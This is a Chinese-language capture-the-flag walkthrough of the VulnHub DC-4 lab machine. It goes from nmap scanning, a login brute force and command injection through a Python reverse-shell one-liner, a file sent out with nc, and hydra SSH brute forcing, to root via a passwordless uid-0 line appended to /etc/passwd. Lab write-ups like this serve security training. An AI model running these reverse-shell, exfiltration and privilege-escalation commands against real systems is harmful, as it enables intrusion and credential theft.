DC-4

• 写写打靶记录。
• 靶机地址：https://www.vulnhub.com/entry/dc-4,313/

信息收集

• 首先查看 Kali IP 地址：

root at kali in ~/DC4 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1418sec preferred_lft 1418sec
    inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

• 使用 Nmap 扫描出一个 IP：10.10.8.23

root at kali in ~/DC4 
$ nmap -sn -T4 --min-rate 10000 10.10.8.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-24 21:03 CST
Nmap scan report for 10.10.8.1
Host is up (0.00010s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000045s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.23
Host is up (0.000060s latency).
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000052s latency).
MAC Address: 00:50:56:FF:CC:3E (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.41 seconds

端口扫描

• 扫描开放端口：

root at kali in ~/DC4 
$ nmap -p- -sT -T4 --min-rate 10000 10.10.8.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-24 21:04 CST
Nmap scan report for 10.10.8.23
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

服务识别

• 扫描端口对应服务：

root at kali in ~/DC4 
$ nmap -p22,80 -sV -O -sT -T4 --min-rate 10000 10.10.8.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-24 21:05 CST
Nmap scan report for 10.10.8.23
Host is up (0.00051s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    nginx 1.15.10
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.64 seconds

漏洞扫描

• 使用 Nmap 进行漏洞扫描：

root at kali in ~/DC4 
$ nmap -p22,80 --script=vuln -T4 --min-rate 10000 10.10.8.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-24 21:05 CST
Nmap scan report for 10.10.8.23
Host is up (0.00040s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.8.23
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.8.23:80/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://10.10.8.23:80/login.php
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 73.05 seconds

• 看了下扫出来的漏洞，没一个有用的。

目录扫描

root at kali in ~/DC4 
$ dirsearch -u http://10.10.8.23 -o $PWD/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/DC4/dirsearch.txt

Target: http://10.10.8.23/

[21:06:04] Starting: 
[21:06:12] 302 -  704B  - /command.php  ->  index.php                       
[21:06:13] 301 -  170B  - /css  ->  http://10.10.8.23/css/                  
[21:06:15] 301 -  170B  - /images  ->  http://10.10.8.23/images/            
[21:06:15] 403 -  556B  - /images/                                          
[21:06:16] 403 -   15B  - /index.pHp                                        
[21:06:17] 302 -  206B  - /login.php  ->  index.php                         
[21:06:17] 302 -  163B  - /logout.php  ->  index.php                        
                                                                             
Task Completed

漏洞利用

• 通常不直接考虑 SSH 爆破，使用浏览器访问 80 端口：

• 一眼自建站点，根据扫描出的目录信息来看只有一个登录框能进行攻击。
• 对于当前登录框而言，可能存在如下问题：
  • SQL 注入/万能密码
  • 弱口令/暴力破解

SQL 注入（失败）

• 输入 admin/123456 后使用 BurpSuite 抓包：

• 将该报文保存后，放入 SQLMap 中进行测试：

root at kali in ~/DC4 
$ sqlmap -r url.txt -v 0        
        ___
       __H__                                                                                                                                
 ___ ___[(]_____ ___ ___  {1.7.8#stable}                                                                                                    
|_ -| . [']     | .'| . |                                                                                                                   
|___|_  [']_|_|_|__,|  _|                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:12:04 /2024-06-24/

got a 302 redirect to 'http://10.10.8.23/index.php'. Do you want to follow? [Y/n] n
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=sli0tvaljvb...5dp3flr0n3'). Do you want to use those [Y/n] n
[21:12:08] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                                          
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] 
[21:12:09] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 21:12:09 /2024-06-24/

• 发现不存在 SQL 注入。

暴力破解

• 既然 SQL 注入不成功，那就试试暴力破解，还是使用刚刚 BurpSuite 的报文，发送到 Intruder 模块：

• 由于界面中有对应提示，可以看出账号可能是 admin：

• 那就选中 password 位置就行了：

• 载入字典，之所以不选 rockyou.txt 还是因为它内容太多了：

• 爆破出 admin 用户的密码为 happy。

RCE

• 登录一下：

• 可以发现有个 Command 按钮，点击一下看看啥个事儿：

• 发现可以执行三个命令：
  • List Files
  • Disk Usage
  • DisK Free
• 尝试 Run 一下：

• 哦豁，发现对方执行的命令是 ls -l，抓个包看看命令是不是由前端传到后端的：

• 可以发现命令确实是前端传到后端执行的，直接修改 radio 内容尝试进行反弹。
• 查看是否存在 NC 命令ls -l /bin | grep nc：

Shell 反弹

• 可以看到对方存在 nc.traditional，是 GNU 版 NC 存在 -e 参数：

root at kali in ~/DC4 
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.23: inverse host lookup failed: Unknown host
connect to [10.10.8.17] from (UNKNOWN) [10.10.8.23] 35938
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

当然也可以使用 Python 进行反弹：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.8.17",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

• 由于当前 Shell 交互性不足，升级一下：

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

主机信息收集

• 有到了主机信息收集环节，累了，上脚本：

root at kali in ~/DC4
$ proxychains curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh

• 将 lse.sh 上传至靶机上，在 Kali 上开启 Web 服务：

root at kali in ~/DC4 
$ python3 -m http.server 80    
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

• 在靶机上下载：

www-data@dc-4:/usr/share/nginx/html$ cd /tmp
cd /tmp
www-data@dc-4:/tmp$ wget http://10.10.8.17/lse.sh
wget http://10.10.8.17/lse.sh
--2024-06-24 23:57:37--  http://10.10.8.17/lse.sh
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55098 (54K) [text/x-sh]
Saving to: 'lse.sh'

lse.sh              100%[===================>]  53.81K  --.-KB/s    in 0s      

2024-06-24 23:57:37 (108 MB/s) - 'lse.sh' saved [55098/55098]

• 赋予执行权限并执行：

www-data@dc-4:/tmp$ chmod +x lse.sh
chmod +x lse.sh
www-data@dc-4:/tmp$ ./lse.sh
./lse.sh
---
If you know the current user password, write it here to check sudo privileges:
......
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/home/jim/test.sh
---
[!] fst030 Can we write to any setuid binary?.............................. yes!
---
/home/jim/test.sh
......

• 现在我们发现了一个 test.sh 脚本，查看内容：

#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."

• 没卵用，换一个脚本：

root at kali in ~/DC4 
$ proxychains git clone https://github.com/rebootuser/LinEnum.git

• 再次上传到靶机上：

www-data@dc-4:/tmp$ wget http://10.10.8.17/LinEnum/LinEnum.sh
wget http://10.10.8.17/LinEnum/LinEnum.sh
--2024-06-25 00:05:18--  http://10.10.8.17/LinEnum/LinEnum.sh
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh          100%[===================>]  45.54K  --.-KB/s    in 0s      

2024-06-25 00:05:18 (866 MB/s) - 'LinEnum.sh' saved [46631/46631]

www-data@dc-4:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh

• 查看执行内容：

www-data@dc-4:/tmp$ ./LinEnum.sh
./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue Jun 25 00:06:18 AEST 2024
......
[-] Location and Permissions (if accessible) of .bak file(s):
-rw-r--r-- 1 jim jim 2047 Apr  7  2019 /home/jim/backups/old-passwords.bak
......

敏感信息泄露v1

• 发现一个 old-passwords.bak 文件，看看文件内容：

000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
......

• 看着像是个密码字典，而用户名是 jim，使用 NC 将这个文件导出到 Kali 上：

# Kali 上执行
root at kali in ~/DC4 
$ nc -lp 6666 > passwd.txt

# 在靶机上执行
www-data@dc-4:/tmp$ nc 10.10.8.17 6666 < /home/jim/backups/old-passwords.bak

SSH 爆破

• 使用 Hydra 进行爆破：

root at kali in ~/DC4 
$ hydra -l jim -P passwd.txt ssh://10.10.8.23:22
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-24 22:19:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://10.10.8.23:22/
[STATUS] 136.00 tries/min, 136 tries in 00:01h, 120 to do in 00:01h, 12 active
[STATUS] 98.00 tries/min, 196 tries in 00:02h, 60 to do in 00:01h, 12 active
[22][ssh] host: 10.10.8.23   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-24 22:21:22

• 得出密码为：jibril04，使用 SSH 登录一下：

root at kali in ~/DC4 
$ ssh jim@10.10.8.23                                          
The authenticity of host '10.10.8.23 (10.10.8.23)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.8.23' (ED25519) to the list of known hosts.
jim@10.10.8.23's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ id
uid=1002(jim) gid=1002(jim) groups=1002(jim)

• 登录成功。

敏感信息泄露v2

• 看看当前目录下有啥玩意儿：

jim@dc-4:~$ ls -al
total 32
drwxr-xr-x 3 jim  jim  4096 Apr  7  2019 .
drwxr-xr-x 5 root root 4096 Apr  7  2019 ..
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 jim  jim  3526 Apr  6  2019 .bashrc
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
-rwsrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh

• 有个 mbox，看看内容：

jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

• 是一封测试邮件，既然有邮件的话，看看右键目录还有没有其他信息：

jim@dc-4:/var/mail$ ls -al
total 24
drwxrwsr-x  2 root     mail 4096 Jun 25 00:06 .
drwxr-xr-x 12 root     root 4096 Apr  5  2019 ..
-rw-rw----  1 jim      mail  715 Apr  6  2019 jim
-rw-rw----  1 www-data mail 8769 Jun 25 00:06 www-data

• 确实有，看看内容：

jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

• 发现了 charles 用户的密码，切换一下：

jim@dc-4:/var/mail$ su - charles
Password: 
charles@dc-4:~$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)

teehee 提权

• 权限还是不够，执行 LinEnum.sh 文件，收集收集信息：

charles@dc-4:/tmp$ ./LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue 25 Jun 00:28:56 AEST 2024
......
[+] We can sudo without supplying a password!
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
......

• 发现 teehee 命令不需要密码即可以 root 权限执行命令，去 GTFOBins 网站查一查：

• 没有，那就很尴尬了，查查 teehee 命令的作用，发现也没有。
• 那就在靶机上查查作用：

charles@dc-4:/tmp$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

• 功能大致上是：将标准输入的内容复制到每个文件中，并同时输出到标准输出。
• 测试测试：

charles@dc-4:/tmp$ echo 'demo' | sudo teehee -a demo.txt
demo

• 可以用，既然可以添加数据，那就直接添加用户到 /etc/passwd 岂不美哉：

charles@dc-4:/tmp$ head -n 1 /etc/passwd
root:x:0:0:root:/root:/bin/bash
charles@dc-4:/tmp$ echo 'yongz::0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd
yongz::0:0:root:/root:/bin/bash

• 切换用户：

charles@dc-4:/tmp$ su yongz
root@dc-4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

• 提权成功，查找 flag：

root@dc-4:/tmp# cd /root
root@dc-4:~# ls -al
total 28
drwx------  3 root root 4096 Apr  7  2019 .
drwxr-xr-x 21 root root 4096 Apr  5  2019 ..
-rw-------  1 root root   16 Apr  7  2019 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  976 Apr  6  2019 flag.txt
drwxr-xr-x  2 root root 4096 Apr  6  2019 .nano
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
root@dc-4:~# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.